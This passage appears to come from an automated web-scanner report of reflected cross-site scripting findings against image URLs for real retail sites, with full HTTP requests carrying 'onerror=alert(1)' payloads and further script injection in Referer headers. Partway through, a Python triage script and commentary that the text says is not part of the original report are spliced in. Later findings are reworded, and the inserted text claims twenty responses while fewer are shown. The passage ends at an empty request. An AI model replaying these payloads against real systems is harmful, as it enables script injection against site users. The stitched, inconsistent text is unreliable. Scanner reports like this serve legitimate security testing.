The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 40198<img%20src%3da%20onerror%3dalert(1)>c102b875793 was submitted in the REST URL parameter 9. This input was echoed as 40198<img src=a onerror=alert(1)>c102b875793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF40198<img%20src%3da%20onerror%3dalert(1)>c102b875793?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assorted50_grn10_PF40198<img src=a onerror=alert(1)>c102b875793

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877 was submitted in the REST URL parameter 9. This input was echoed as b5eda<img src=a onerror=alert(1)>edca8607877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img src=a onerror=alert(1)>edca8607877

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5 was submitted in the REST URL parameter 9. This input was echoed as efcb0<img src=a onerror=alert(1)>e1c89bf3dc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img src=a onerror=alert(1)>e1c89bf3dc5

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd052<img%20src%3da%20onerror%3dalert(1)>161137e8761 was submitted in the REST URL parameter 9. This input was echoed as dd052<img src=a onerror=alert(1)>161137e8761 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img%20src%3da%20onerror%3dalert(1)>161137e8761?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img src=a onerror=alert(1)>161137e8761

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16 was submitted in the REST URL parameter 9. This input was echoed as dd2be<img src=a onerror=alert(1)>86af9b73a16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img src=a onerror=alert(1)>86af9b73a16

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21 was submitted in the REST URL parameter 9. This input was echoed as c2bf3<img src=a onerror=alert(1)>1ee7bd55e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img src=a onerror=alert(1)>1ee7bd55e21

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43 was submitted in the REST URL parameter 9. This input was echoed as 6ef1c<img src=a onerror=alert(1)>f003a515b43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:12 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img src=a onerror=alert(1)>f003a515b43

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f was submitted in the REST URL parameter 9. This input was echoed as 4a901<img src=a onerror=alert(1)>846a86c1b6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_14a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:11 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10106_14a901<img src=a onerror=alert(1)>846a86c1b6f

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5 was submitted in the REST URL parameter 9. This input was echoed as fc21b<img src=a onerror=alert(1)>039a8b320c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:59 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img src=a onerror=alert(1)>039a8b320c5

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f was submitted in the REST URL parameter 9. This input was echoed as 318c3<img src=a onerror=alert(1)>14ddc48f11f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:04 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img src=a onerror=alert(1)>14ddc48f11f

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68 was submitted in the REST URL parameter 9. This input was echoed as 443e5<img src=a onerror=alert(1)>94aad6f4a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:07 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img src=a onerror=alert(1)>94aad6f4a68

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341 was submitted in the REST URL parameter 9. This input was echoed as d1ba3<img src=a onerror=alert(1)>a60921a1341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:11 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img src=a onerror=alert(1)>a60921a1341

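Every finding against a1128.g.akamai.net in this section has the same shape: the image name taken from the path is echoed into a 403 body that is declared as text/plain. Whether that is exploitable depends on the response's Content-Type and X-Content-Type-Options headers, not only on the reflection, so a scanner hit of this kind is worth triaging before it is rated. The Python script below is added here as an example and is not part of the original report or of any scanner; it parses a raw HTTP response and classifies the reflection. The sample responses are constructed: the first reproduces the 403 shown in 4.150 above, while the text/html, nosniff, HTML-encoded and missing-Content-Type variants are hypothetical. The function and constant names are the example's own.

```python
# Added example (not from the original scanner report): triage a
# reflected-input finding by asking whether the reflection would actually
# be parsed as HTML.  Sample responses are constructed below; the first
# mirrors the 403 text/plain response shown in finding 4.150, the rest are
# hypothetical variants.
from urllib.parse import unquote

# Media types a browser parses as HTML without sniffing.
HTML_TYPES = {"text/html", "application/xhtml+xml"}


def parse_response(raw: str):
    """Split a raw HTTP/1.x response into (status, headers, body).

    Header names are lower-cased; a repeated header keeps its last value,
    which is enough for the Content-Type / X-Content-Type-Options check.
    """
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def reflection_verdict(payload: str, raw_response: str) -> str:
    """Classify how a URL-encoded payload comes back in a response.

    Returns one of:
      not-reflected              payload absent from the body
      encoded                    reflected with < > & HTML-escaped (safe)
      exploitable                reflected verbatim into an HTML body
      sniffable                  reflected verbatim, no Content-Type at all
      reflected-sniff-dependent  verbatim in a non-HTML type, no nosniff
      reflected-inert            verbatim in a non-HTML type with nosniff
    """
    _status, headers, body = parse_response(raw_response)
    # The server decodes the path before echoing it, so compare the
    # decoded form of what the scanner sent.
    decoded = unquote(payload)
    if decoded not in body:
        escaped = (decoded.replace("&", "&amp;")
                          .replace("<", "&lt;")
                          .replace(">", "&gt;"))
        return "encoded" if escaped in body else "not-reflected"
    ctype = headers.get("content-type", "").split(";", 1)[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").lower() == "nosniff"
    if ctype in HTML_TYPES:
        return "exploitable"
    if not ctype:
        return "sniffable"
    return "reflected-inert" if nosniff else "reflected-sniff-dependent"


def build_response(content_type, body, extra_headers=()):
    """Assemble a constructed 403 response in the shape seen in this report."""
    headers = ["HTTP/1.0 403 Forbidden", "Server: Apache-Coyote/1.1",
               "Pragma: no-cache"]
    if content_type:
        headers.append("Content-Type: " + content_type)
    headers += ["Content-Length: %d" % len(body), "Cache-Control: no-store",
                "Connection: close", *extra_headers]
    return "\r\n".join(headers) + "\r\n\r\n" + body


# Payload and echoed body taken from finding 4.150 above.
PAYLOAD = "d1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341"
ECHO = ("Unable to find /ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ"
        "d1ba3<img src=a onerror=alert(1)>a60921a1341")

AS_SEEN = build_response("text/plain", ECHO)                 # as shown in the report
AS_HTML = build_response("text/html", ECHO)                  # hypothetical
WITH_NOSNIFF = build_response("text/plain", ECHO,
                              ["X-Content-Type-Options: nosniff"])  # hypothetical fix
ENCODED = build_response("text/html",
                         ECHO.replace("<", "&lt;").replace(">", "&gt;"))  # hypothetical fix
NO_TYPE = build_response(None, ECHO)                         # hypothetical

if __name__ == "__main__":
    for name, resp in [("as seen", AS_SEEN), ("text/html", AS_HTML),
                       ("nosniff", WITH_NOSNIFF), ("encoded", ENCODED),
                       ("no type", NO_TYPE)]:
        print("%-10s %s" % (name, reflection_verdict(PAYLOAD, resp)))
```

Run over the twenty a1128.g.akamai.net responses in this section, the function returns reflected-sniff-dependent for each, which is the honest rating for them: the origin should HTML-encode the path before echoing it into the error message (the "encoded" case) and add X-Content-Type-Options: nosniff to its error responses, and until it does the finding should be confirmed in a sniffing client rather than marked Certain.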
4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload adbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6 was submitted in REST URL parameter 9 and was echoed as adbc9<img src=a onerror=alert(1)>5310c9a9fa6 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:48 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img src=a onerror=alert(1)>5310c9a9fa6

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload 4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c was submitted in REST URL parameter 9 and was echoed as 4d8aa<img src=a onerror=alert(1)>3b6dc5e579c in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

